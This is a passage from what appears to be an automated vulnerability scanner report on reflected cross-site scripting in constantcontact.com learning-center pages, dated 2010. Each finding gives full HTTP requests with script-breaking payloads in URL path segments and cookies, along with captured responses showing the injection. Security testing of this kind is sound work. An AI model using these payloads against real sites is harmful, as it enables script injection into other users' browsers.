<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/glossary/social-media/514c8';alert(1)//ec972dfd61a/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.183. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/em/social.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0ae'%3balert(1)//cda7af06587 was submitted in the REST URL parameter 1. This input was echoed as 4a0ae';alert(1)//cda7af06587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center4a0ae'%3balert(1)//cda7af06587/hints-tips/em/social.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:45 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=FF658ED51AC3C14805E9F4356DD82EAC.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:45 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:45 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:45 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:45 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center4a0ae';alert(1)//cda7af06587/hints-tips/em/social.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B
...[SNIP]...

2.184. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/em/social.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddc5c'%3balert(1)//81c0d45acf4 was submitted in the REST URL parameter 2. This input was echoed as ddc5c';alert(1)//81c0d45acf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/hints-tipsddc5c'%3balert(1)//81c0d45acf4/em/social.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:49 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=67E36320B94ABC0567567C0BB61BBEA9.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:49 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/hints-tipsddc5c';alert(1)//81c0d45acf4/em/social.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EB
...[SNIP]...

2.185. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/em/social.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94dd4'%3balert(1)//85f83fa80fd was submitted in the REST URL parameter 3. This input was echoed as 94dd4';alert(1)//85f83fa80fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/hints-tips/em94dd4'%3balert(1)//85f83fa80fd/social.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:54:51 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=F836DDDE333173579C478F3C732547F4.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:51 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:51 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:51 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/learning-center/hints-tips/em94dd4alert(1)//85f83fa80fd/social.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:51 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "0dcf147946ab64fc406a44a2c51023373"
Content-Language: en
Content-Length: 27050
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/hints-tips/em94dd4';alert(1)//85f83fa80fd/social.jsp';
s.server='534';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.wor
...[SNIP]...

2.186. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/em/social.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 602ed'%3balert(1)//53ad3272ded was submitted in the REST URL parameter 4. This input was echoed as 602ed';alert(1)//53ad3272ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/hints-tips/em/602ed'%3balert(1)//53ad3272ded HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 25 Nov 2010 04:54:58 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=C83C504FF5545D0A2B6EA9A942F97F33.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/learning-center/hints-tips/em/602edalert(1)//53ad3272ded|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 6461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/hints-tips/em/602ed';alert(1)//53ad3272ded';
s.server='534';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landing
...[SNIP]...

2.187. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/ht-2010-05b.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abd62'%3balert(1)//e11b50c9e7d was submitted in the REST URL parameter 1. This input was echoed as abd62';alert(1)//e11b50c9e7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-centerabd62'%3balert(1)//e11b50c9e7d/hints-tips/ht-2010-05b.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:41 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=DEBECEDA1FC5DCF81AF8512ACDF0DABB.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-centerabd62';alert(1)//e11b50c9e7d/hints-tips/ht-2010-05b.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E
...[SNIP]...

2.188. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/ht-2010-05b.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd34'%3balert(1)//7424eac80f3 was submitted in the REST URL parameter 2. This input was echoed as 9cd34';alert(1)//7424eac80f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/hints-tips9cd34'%3balert(1)//7424eac80f3/ht-2010-05b.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:52 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=93CE781655E787CBE012CBFDFCBD93B1.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:52 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:52 GMT; Path=/
